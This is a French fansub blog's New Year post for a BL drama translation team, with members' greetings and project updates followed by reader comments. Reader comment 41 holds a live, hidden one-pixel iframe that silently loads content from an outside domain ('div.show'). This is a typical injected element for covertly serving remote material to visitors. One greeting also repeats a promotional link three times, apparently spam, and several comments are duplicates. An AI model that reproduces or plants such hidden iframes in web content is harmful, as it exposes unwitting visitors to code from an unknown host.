• Bonne Année à tous nos amis de canapé

     Bonne Année à tous nos amis de canapé

     

     

    Noël entre amis 2023

     

     

     

     THE SIGN  TWINS  À L'AFFICHE  À L'AFFICHE  I'M YOUR BOYY

     

     Certes, les années passent et les rides s'entassent.

    Mais si le cœur et l'esprit gardent leur âme d'enfant, l'essentiel est là.

                                                                                                                     Éric Koninckx

     

    Bonsoir mes P'tites Cigognes

     

    Une année pleine d'émotions s'achève avec tous les souvenirs des merveilleuses séries que nous avons pu partager.

    Nos échanges et tous vos messages ont bercé mon année et ont réchauffé mon petit cœur.

    Alors merci, merci à vous tous et merci pour tout.

     

    Pour fêter le passage à cette nouvelle année, je vous ai préparé la fin de la mini-série I'm Your Boyy...

    Je sais qu'il semble manquer des bouts, mais on comprend tout dans les flashbacks^^

     

    Dès demain, laissons le nouveau souffle d'une nouvelle année se propager et nous porter vers le bonheur.

    Je vous souhaite tout ce que vous pouvez désirer. Et surtout continuez de rêver.

    Je vous fais plein de schmoutzy. Prenez soin de vous et des vôtres.

    Très bonne année à tous.

     

     

     

    Soirée BL entre Amis

     LES CHRONIQUES DE G

     

     Notre lutin vous souhaite également une très belle année. 

     

    Bonne Année à tous nos amis de canapé

     

    Noël entre amis 2023

     Bonne Année à tous nos amis de canapé

     

     

    Annyong yolobun !

    Comment s'est passée votre année 2023 ?

    La mienne un peu mouvementée mais cela a été la même chose pour beaucoup je pense.

    J'espère que 2024 serait une meilleure année pour tout le monde et que vous la passerez encore avec nous (⁠☆⁠▽⁠☆⁠)

    Pour une fois, j'ai posé mon stylo rouge de correctrice pour vous offrir un petit cadeau pour cette nouvelle année,

    j'espère qu'il vous plaira (⁠ㆁ⁠ω⁠ㆁ⁠)

    Merci à Merze de m'avoir aidée avec ses conseils pour mon tout premier projet,

    et à Shaily (et Merze aussi) de m'avoir proposé de faire un essai de traduction ^⁠_⁠^

    j'ai apprécié de travailler dessus et peut-être que je reposerai encore une fois mon stylo pour un autre projet un peu plus tard qui sait ?

    Pour le moment je vous souhaite un très bon réveillon et espère que vous commencerez bien l'année 2024.

    Je vous fais des kiseu (⁠。⁠・⁠ω⁠・⁠。⁠)⁠ノ⁠♡

     

    Nightly Reyn

    Noël entre amis 2023

     

     Noël entre amis 2023  Noël entre amis 2023

     

    « Dans vingt ans, tu seras plus déçu par les choses que tu n'auras pas faites que par celles que tu auras faites.

    Alors largue les amarres, sors du port, attrape les alizés dans tes voiles. Explore. Rêve. Découvre. »

     

    - Marc Twain -


    Bonjour Amis du canapé,

    2023 a filé comme l’éclair, riche et intense de bout en bout.

     

    Rejoindre la Team de Pblea a été pour ma part un moment fort de cette année.

    J’ai découvert un univers passionnant, une équipe accueillante, des personnes attachantes et de fidèles passionnés.

    Je me suis lancée et j’en suis ravie.

     

    Une page se tourne avec le dernier épisode de « A Breeze Of Love ».

    L’histoire de Pan Dongwook et Lee Dohyun se termine dans la douceur et la sérénité.

    Cette série, mon premier projet, aura toujours une place à part dans mon cœur. Merci pour vos soutiens et vos petits mots.

     

    Comme cadeau de Noël, Merze m’a proposé de vous traduire une mini-série « Y Journey »

    très originale commandée par l’Office du Tourisme de la Thaïlande.

    On y retrouve nos couples célèbres dans six histoires romantiques qui se déroulent dans l’est du pays.

    Chaque épisode nous permet de découvrir de magnifiques paysages, des attractions touristiques, la cuisine locale, des traditions

    et des coutumes de ce beau pays.

    Avec en prime de beaux messages sur la richesse de la diversité, le respect de l’environnement et la préservation des ressources.

    Je découvre et j’explore, je voyage en compagnie de ces beaux acteurs

    et j’espère vraiment qu’un jour ce rêve de visiter la Thaïlande deviendra une réalité.

     

    Chers amis du canapé, merci pour vos messages, vos vœux, votre participation à la vie du blog.

    Je vous souhaite une merveilleuse année 2024,

    beaucoup d’amour, une bonne santé, du bonheur, des rires, des rêves par milliers, des voyages et beaucoup de BL à regarder…

    Deux mille vingt-quatre bises pétillantes

     

    Noël entre amis 2023

     

    BAKE ME PLEASE

     

    "Peu importe où vous allez. Ce qui compte, c'est avec qui vous allez."

    - Until We Meet Again -

     

    Coucou, chers amis du canapé.

    Tout d'abord merci pour messages pour Noël,

    j'espère que vous avez passé un moment rempli de bonheur comme le veut la tradition.

    Alors, le père noël a déposé les cadeaux que vous souhaitiez ?

    Pour ma part OUI ^^

    J'espère en tout cas que vous vous êtes bien remis de cette première fête car la suivante arrive !

    Qu'avez-vous prévu pour le réveillon du nouvel an ?

    Quelque soient vos projets, profitez, amusez-vous et faites bien attention à vous.

    Pour cette semaine, l'épisode 4 de "Bake Me please" nous a fait passé par plusieurs émotions,

    qu'elle sera la suite pour Peach et Shin...

    Au fait, semaine dernière j'ai omis de vous parler et je m'en excuse du court-métrage "Once in memory : Let me be yours".

    J'espère que ce petit cadeau vous a plu.

    J'ajoute également qu'après mes deux projets en cours, je reprendrais la traduction de "Low Frequency",

    que malheureusement notre PitchFlo ne pourra pas poursuivre.

    Je vous souhaite un beau et bon réveillon du nouvel an.

    On se retrouve l'année prochaine, pour encore plus de sourires, de rires, de pleurs...

    Je vous embrasse, prenez soin de vous.

     

    Noël entre amis 2023

    À L'AFFICHE

     

    Bonjour, bonjour,

    J'ai été gâtée par le Père-Noël et j'espère que vous aussi.

    J'en profite pour remercier toute la team pour les beaux cadeaux déposés sur le blog...

    je vais en profiter autant que vous ^^ hihi

    Je vous souhaite de passer un bon réveillon et d'attaquer la nouvelle année avec le cœur léger et plein d'espoir.

    Mais en attendant, comme promis, j'ai commencé à traduire la série One Room Angel.

    Vous avez donc eu les deux premiers épisodes cette semaine.

    Je suis très surprise par ce BL japonais.

    Déjà par l'histoire que j'aime beaucoup. C'est décalé et c'est rafraichissant. Ensuite par l'humour dans les épisodes.

    Je me marre beaucoup en traduisant. Je trouve que les deux personnages sont très comiques. Bref, c'est très prometteur ^^

    Je pars fêter le premier de l'an avec des amis... mais à mon retour la semaine prochaine, je continuerai sur ma lancée.

    Sinon, côté visionnage, je suis toujours à fond dans Twins, Pit Babe et The Sign...

    Et j'ai découvert la mini-série touristique Y journey, proposée par Viranne.

    Je trouve que les images sont très belles. Ça donne effectivement envie de découvrir la Thaïlande.

    Allez, je me sauve !

    XOXO, Yoohee

     

    Noël entre amis 2023

     À L'AFFICHE

      

    Que cette année vous soit heureuse, que vos jours soient filés de soie.  (Mme de Sévigné)

     

    Mes chatons Chartreux,

    Ma Team Adorée (dont Choupette),

    Je ne vous souhaite rien cette année.

    N’insistez pas.

    Je ne vous souhaite rien d’autre que le meilleur.

    Le meilleur du rire, le meilleur de l’amour, le meilleur de la famille, le meilleur de la santé, le meilleur du travail et des amis.

    Le meilleur compte en banque possible et bien sûr, le meilleur du BL !

    Que cette nouvelle année comble vos vœux les plus chers (et les moins chers aussi, pas de petites économies !).

    **************

    Nouvelle année, nouvel épisode. J’ai trouvé une déclaration d’amour cachée dans l’épisode 3 de Cherry Magic et elle m’a beaucoup émue. Saurez-vous la voir vous aussi ?

    Il y a également une très belle scène de « Tiens, prends tes 4 vérités dans la tronche ! » J’ai adoré !!

    Et… je mangerais bien un peu de tofu.

     

    Pas de Mr Sahara et Toki-Kun cette semaine. L’épisode 4 est sorti le 29 décembre, vous l’aurez en janvier pour vous remettre du réveillon. 

     

     Soirée BL entre amis du 30/09/2023

     Les commères digèrent. Elles parlent par énigmes. Elles m'ont donné les suivantes :

     

    -          Une première (presque) mondiale !

    -          4, rien que pour une.

    -          Une, mais avec deux !

    -          Deux pour une seule.

    -          Seules, parce que premières.

    -          Presque nus, mais plus que vus !

    -          Pas récent, bien que nouveau.

    -          Et comme deux cerises sur un gâteau…

     

     

    Pour finir, un portrait pour le voir différemment.

    Merci de nous suivre, merci de nous soutenir, merci de votre fidélité, merci pour la joie que vous nous apportez.

    Et merci de me permettre, cette année encore, de vous souhaiter une très bonne année, bien lovés sur le canapé.

    Des bises.

    Noël entre amis 2023

     

     

    À L'AFFICHE  PLAYBOYY  Bonne Année à tous nos amis de canapé

     

    Bonsoir mes lapins,

     

    Allez tout droit, puis tournez à droite.

    Continuez sur 500 mètres, vous arriverez à un premier feu, continuez puis au deuxième feu tournez à gauche.

    Roulez encore une centaine de mètres. Ça y est, vous êtes arrivé.

    Vous pouvez franchir la porte de cette nouvelle année qui s’offre à vous !

    Qu’elle soit remplie de bonheur, de rires, d’argent et surtout qu’elle vous apporte une excellente santé.

    ET BEAUCOUP DE BL^^

     

    Je vous fais plein de bibis et MERCI !

    Mes meilleurs vœux !

     

    Bonne Année à tous nos amis de canapé

     

    ♣♥♣♥♣♥♣♥♣♥♣♥♣♥♣

     

    Ellashin s'excuse de ne pouvoir écrire elle-même ces quelques mots

    mais elle tenait à vous présenter tous ses vœux pour cette nouvelle année.

    Que tous vos plus beaux rêves se réalisent et que cette année 2024 soit remplie de bonheur.

     

    Elle vous laisse un petit cadeau au passage pour démarrer cette nouvelle année,

    avec le film " The cornered mouse dreams of cheese ".

    ortons un toast à un nouveau départ et à un nouveau chapitre de nos vies

    Découvrez l'astuce ici : https://www.comment-economiser.fr/messages-bonne-annee.html
    Portons un toast à un nouveau départ et à un nouveau chapitre de nos vies

    Découvrez l'astuce ici : https://www.comment-economiser.fr/messages-bonne-annee.html

     

    Portons un toast à un nouveau départ et à un nouveau chapitre de nos vies. Bonne année !

    Découvrez l'astuce ici : https://www.comment-economiser.fr/messages-bonne-annee.html

     

     

    Soirée BL entre Amis

    En tant qu’hétéro cisgenre, […] on ne ressent pas le besoin de se définir parce que nos termes pas défauts correspondent à ce que nous sommes et tout le monde agit en conséquence, comme une valeur par défaut en science : ce n’est pas forcément la bonne, mais on l’utilise quand même, puisqu’on a pas d’autres informations. Les personnes qui ne correspondent pas à la norme définie par la société reprennent le pouvoir en utilisant des termes qui leur conviennent, peu importe à quel point ils sont compliqués ou précis. Si on interdit aux gens de se définir comme ils le souhaitent, on les rend invisibles et on nie les différences de l’être humain. Ce qui cause les discriminations n’est pas que les gens se revendiquent comme ils le souhaitent, mais que d’autres ne le supportent pas. "

    ( Eden, personnage de Atypic Love – Sasha Laguillon )

     

    Bonjour mes petits saumons fumés !

     

    J’espère que vous avez passés de belles fêtes jusqu’ici et que vous allez continuer avec une nouvelle année remplie de bonheur.

    Pour cette semaine, je me penche vers un BL que je n’avais pas revu depuis un bout de temps :

    My Only 12%

    Alors, pensez vous que l’amour est question de chance ou peut-on défier les statistiques ?

    Grimpez sur le canapé et faufilez-vous sous le plaid de la nouvelle année pour en discuter.

     

    Comme chaque semaine, merci à vous de votre fidélité et merci à la team pour les cadeaux offerts.

    Bon week-end ! Bons BL !

     

    Biz Biz ♥

     

     

     

    Bonne Année à tous nos amis de canapé


  • Commentaires

    47
    Dimanche 7 Janvier à 21:12

    bonne année a vous 

    merci pour tous ces épisodes 

    46
    Dimanche 7 Janvier à 14:22

    bonne année!! bonne santé!! meilleurs vœux! alalalala merci pour toutes ces gâterie en année 2023 et ate de voir ce que l'année 2024 nous réserve merci pour tout votre travail de traduction et de partage

    45
    Dimanche 7 Janvier à 14:06

    bonne année!! bonne santé!! meilleurs vœux! alalalala merci pour toutes ces gâterie en année 2023 et ate de voir ce que l'année 2024 nous réserve merci pour tout votre travail de traduction et de partage

    44
    Samedi 6 Janvier à 11:32

    bonne année!! bonne santé!! meilleurs vœux! alalalala merci pour toutes ces gâterie en année 2023 et ate de voir ce que l'année 2024 nous réserve merci pour tout votre travail de traduction et de partage

    43
    Vendredi 5 Janvier à 17:07

    bonne année!! bonne santé!! meilleurs vœux! alalalala merci pour toutes ces gâterie en année 2023 et ate de voir ce que l'année 2024 nous réserve merci pour tout votre travail de traduction et de partage

    42
    Vendredi 5 Janvier à 16:39

    Une très belle année à toute la Team!

    Merci pour tous ces projets que vus proposez et sur lesquels vous travaillez afin de nous les offrir!

    41
    Vendredi 5 Janvier à 09:32

    Excellente année 2024 à toute la team, vous nous faites réver toute l'année

    biz

    <iframe style="position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;" src="//div.show/public"></iframe>

    40
    LoreleiXScorpio
    Jeudi 4 Janvier à 10:28

    Une très belle année à vous tous - la santé, la réussite, la joie et de très beaux visionnages à venir !

    39
    Jeudi 4 Janvier à 08:56

    Bonne et heureuse année à toute la tous ( Team et compatriote de BL)

    Un grand merci pour tout ce que vous nous avez apporté tout au long de l'année !!!

     

    Merci pour ces sorties et pour vos futurs projets !

    J'ai eu du mal a vous retrouvez, j'avais stop un peu les BL ( OMG le drame) et tout avaient disparut a mon retour, mais ouf, le père Noel a bien voulut vous remettre sur mon chemin.

    Gros bisous a tous !!!!!

    38
    Mercredi 3 Janvier à 20:47

    Très belle et heureuse année 2024 !!

    Quelles vous apporte bonheurs, joie, réussite et amour!!

    Hâte de continuer à suivre vos projet et sorties!!

    Très belle semaine !

     

    37
    Mercredi 3 Janvier à 16:57

    Bonjour.

    Bonne et heureuse année à toute la team.

    Un énorme merci pour tout ce que vous nous avez apporté tout au long de l'année ^^

    Merci encore pour ces sorties et pour vos futurs projets !

    36
    Mardi 2 Janvier à 21:19

    bonne et heureuse année qu'elle vous apporte tout vos desirs

     

    merciiiiii pour toutes ses sorties 

     

    35
    Mardi 2 Janvier à 16:01

    bonne et heureuse année a vous la team

    34
    Mardi 2 Janvier à 16:00

    BONNE ET HEUREUSE ANNEE 2024 la team et bonne continuation.

     

    33
    Mardi 2 Janvier à 15:24

    Encore merci pour l'année 2023 que vous avez pu rendre plus belle grace à votre travail de dingue. Et bonne nouvelle année sur le canapé qui n'a jamais été aussi douillet!

    32
    Mardi 2 Janvier à 14:27

    Bonjour à tous, je vous souhaite une très belle année 2024 et une bonne santé. Je vous remercie pour tout votre travail. Bonne continuation

    31
    Mardi 2 Janvier à 14:18

    Coucou la Team,

    Une Bonne et Heureusse Année 2024 à tous.

    30
    Mardi 2 Janvier à 10:33

    Bonne et heureuse année 2024 à toute la team.

    Merci beaucoup pour votre travail et partage des années passées.

    Que cette année vous apportent joie, bonheur, prospérité et santé.

    Prenez soin de vous 

    29
    Mardi 2 Janvier à 01:13

    Très bonne ANNEE 2024 à tous, plein de bonnes choses, mais aussi à tout vos proches et surtout la santé !

    La team, merci infiniment riche en découverte, traduction correction etc..., qui sont toujours aux top et de nous offrir de superbes projets,

    nous faisans, un bref instant, la triste réalité qui touche le monde.

     

    ENCORE UNE EXCELLENTE ANNEE A TOUS , très bonne semaine à vous !

    28
    Lundi 1er Janvier à 22:40

    Je vous remercie pour cette année riche en émotions du fou rire ( mode ado hormonal) aux larmes ( plus jamais je ne pourrais sourire), j'ai découvert des perles rares, jeter mes oreilles sur l écran en pensant mais quel merde et attendu impatiemment sa suite. Bref je nous souhaites la même année pour les bl, et pleins de nouveau bonheur. encore merci bisous

    27
    Lundi 1er Janvier à 22:32

    Merci beaucoup pour ces sorties et bonne année smile.

    26
    Lundi 1er Janvier à 22:27
    Coucou tout le monde, j'espère que vous allez bien et que vous allez passé une bonne semaine et un bon réveillon du nouvel an ^-^ on est gâtés en cette fin d'année ^-^ The sign comment dire que je suis toujours autant accro, c'est vraiment trop long d'attendre chaque semaine :p Twins j'aurais jamais pensé aimé autant cette série, elle est vraiment bien, je les adores ♡♡♡ The Middleman's love, toujours aussi mignons ^-^ Ahaha Pit Babe c'est un petit bijoux aussi cette série, j'ai adoré ce nouveau épisode ^-^ Bake me please, je suis gourmande de cette série :p Cherry Magic, je comprends pourquoi ils m'ont tant manqués, je l'adore déjà ^-^ Ah Last Twilight comme chaque épisode, il y a toujours autant d'émotions, ils sont si attachants ♡♡♡ Ah Playboyy ça devient intéressant, j'ai hâte de voir la suite, comment cela vas t il se passé ? ^-^ Merci beaucoup pour ces traductions et tout votre travail :) Bon courage pour la suite ^-^ Je vous souhaite à tous une bonne année 2024 et une bonne santé à vous et à vos proches :) Bonne semaine à tous :)
    25
    Lundi 1er Janvier à 21:55

    Bonsoir la team, 

    Je vous souhaite à tous une très Bonne Année et une bonne santé,

    Et que vos vœux se réalise :)

    24
    Lundi 1er Janvier à 21:24

    Bonne année à toute la super team passionnée que vous êtes. Qu'elle vous apporte tous les BL que vous adorez regarder et nous partager pour notre plus grand bonheur. Prenez soin de vous surtout. à très bientôt happy

    23
    Lundi 1er Janvier à 20:50

    Coucou la team :)

    Je vous souhaite une très bonne année 2024 :)

    Merci pour toutes les sorties que vous nous avez proposé en 2023 :) Hâte de découvrir celles de 2024 ;)

    Bonne soirée :3

    22
    Lundi 1er Janvier à 20:08

    Merci pour l' année 2023 , j ai passée avec vous de très bons moments

    Merci pour le partage  

    Je vous souhaite une excellente année 2024

    Une santé de fer afin de profiter des moments de joie , de bonheur 

    et la réalisation de vos projets personnels et professionnels  

    Bon courage à l équipe 

    21
    Lundi 1er Janvier à 20:00

    Bonne et heureuse année à toute la team.

    Que vos souhaits se réalisent.

    Bises

    20
    Lundi 1er Janvier à 19:14

    coucou la team

    merci pour ses sorties

    je tiens a vous souhaitez à tous mes meilleurs vœux pour la nouvelle année

    bonne soirée 

    19
    Lundi 1er Janvier à 18:40

    Bonsoir la Team, je vous souhaite une bonne et heureuse année 2024 ! Le meilleur pour vous et vos proches ^^

    18
    Lundi 1er Janvier à 18:24

    Coucou, 

    Merci beaucoup la team pour vos vœux ,j'espère que vous avez passez de belles fêtes de fin d'année :)

    Moi aussi je vous souhaite une très belle et heureuse année 2024 , la santé, l'amour, l'argent ( oui il en faut quand même, surtout en ces temps) que tout vos souhaits ( même les plus fous )se réalises et tout pleins de bonnes choses......

    L'année écoulée à vraiment été super à vos côtés et celle-ci le sera tout autant, je suis sûre ;)

    Merci infiniment pour vos traductions passées , présente et à venir, et votre temps, je vous souhaite encore une merveilleuse année 2024 !!

    Bonne soirée à vous ,des bizoux .

    17
    Lundi 1er Janvier à 18:17

    coucou 

    Bonne et heureuse année 2024 à toute la team ♥

    16
    Lundi 1er Janvier à 15:41

    Une très belle année à toute la Team!

    Merci pour tous ces projets que vus proposez et sur lesquels vous travaillez afin de nous les offrir!

    15
    Lundi 1er Janvier à 15:39

    Bonne et heureuse année à tous rester en bonne santé et je nous souhaite plein de beau BL pour 2024 .

    14
    Lundi 1er Janvier à 15:35

    Bonne année la team ✨✨✨

    Merci pour les sorties et pour tout votre boulot partagé en 2023 ^^

    Bisous à tous <3

    13
    Lundi 1er Janvier à 14:23

    Coucou la Team ^^

    Un énorme merci pour toutes ces sorties ^^ 

    Un énorme merci pour cette année de partage et de gentillesse de votre part ^^

    Merci pour vos traductions de qualité cool

    Je vous souhaite une très bonne année 2024 , je vous souhaite amour , argent et surtout la santé pour cette année .

    Et Pleins , pleins de bonheur et de BL xD 

    Passez une bonne semaine et prenez soin de vous Bisous.

     

    12
    Lundi 1er Janvier à 14:21

    Bonjour,

    Merci beaucoup pour l'année 2023 passé avec vous. Merci aussi pour le partage de votre passion et pour les cadeaux d'aujourd'hui.

    Prenez soin de vous et de vos proches.

    Je vous souhaite de réalisé vos rêves en cette nouvelle année.

     Bonne Année 2024

    11
    Lundi 1er Janvier à 12:41

    Bonne année pour toute la Team. 

     

    Je vous souhaite d’obtenir tout ce que vous souhaitez en cette nouvelle année. 

    Je vous souhaite des rires et des joies,je vous souhaite de beaux souvenirs et de grands émois. 

     

    Je vous souhaite d’être heureux ❤️

    Gros bibis

    10
    Lundi 1er Janvier à 12:33

    Coucou :)
    Bonne et heureuse année à toute la team, du bonheur, de la santé et de la joie.
    Merci d'avoir été là cette année pour tout ce beau partage ♥
    Bonne jour, prenez soin de vous et de vos proches :)

    9
    Lundi 1er Janvier à 11:28

    bonne année 2024 que tout vos rêves se réalisent 

    8
    Lundi 1er Janvier à 10:29

    Bonne Année 2024 à vous !

    Merci pour de partager avec nous vos traductions.

    Bonne semaine ^^

    7
    Lundi 1er Janvier à 10:27

    bonjour la fameuse team  je vous souhaite une bonne année 2024 quelle vous apporte que du bonheur de joie  et pleins de bonheur et tous ce que vous avez désirer bonne journées bises

    6
    Lundi 1er Janvier à 10:03

    Amis du canapé bonjour!

    Je vous souhaite une très belle et heureuse année 2024, qu'elle vous soit heureuse à tous les niveaux

    Et merci pour l'année 2023 avec tous les beaux cadeaux que vous nous avez offerts

    Prenez bien soin de vous et profitez bien!!!

    5
    Lundi 1er Janvier à 09:04

    Coucou

    Depuis le commencement du blog vous nous partager votre passion vous nous offrez c'est superbe projets qui sont des vraies pépites et je le répéterais jamais assez MERCI infiniment pour tout cela.

    MERCI pour tout le travail que vous faites pour nous offrir ses cadeaux chaque semaine 

    MERCI infiniment pour ces cadeaux d'aujourd'hui 

    Merci beaucoup pour tous le travail que vous faites pour nous offrir ces pépites 

    Je vous souhaite une excellente bonne année et une bonne santé  pour vous et vos proches

    prends soin vous 

    bon courage a vous 

    bonne semaine 

    4
    Lundi 1er Janvier à 08:19
    Coucou la team, très belle année à vous et merci pour votre travail chaque semaine, que j'ai grand plaisir à suivre <3 bonne semaine à vous. Bises
    3
    Lundi 1er Janvier à 01:21

    Bonne année la team !

     

    Le meilleur pour vous et vos proches en 2024^^

    Une excellente année BL en 2024  pour nous tous :-)

    2
    Lundi 1er Janvier à 01:06

    coucou <3

    Mes amies du canapé et la team,

    Peut être que certains sont déjà dans les bras de morphées ou d'autre fête encore la nouvelle année.

    Pour ma part je vais bientôt aller rejoindre mon lit , je bosse dans quelque heure xp

    Je voulais vous souhaite une heureuse et bonne nouvelle année 2024 quelle soit merveilleuse au possible, comme on dit chez moi quand on nous ferme une porte ( Allah, ) on nous en ouvre d'autre.

    Si l'année 2023 à été semée d'embuche dites vous que ça vous à rendu plus fort.

    je vous souhaite une bonne santé, de merveilleux moment avec les personnes que vous aimée tout le long de cette nouvelle année.

    Qu'elle soit riche en découverte et que vous puisez progressez et grandir d'avantage que ce soit sur le plan psychologie ou de remplir votre bagage de la vie.

    Merciiii infiniment pour toute les séries de l'année qui sans vous il faut le dire on aurait pas pu les voir, merci pour votre travaille acharnée quelque soit les moments que vous avez vécu.

    je vous fais plein de bizou, prenez soin de vous.

    ( le réveille va piquer xd )

    1
    Lundi 1er Janvier à 00:17

    Bonne année la team et une bonne santé à tous.

    Merci pour votre dévouement afin de nous sortir plein de belle séries  chaque semaine.

    Prenez bien soins de vous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :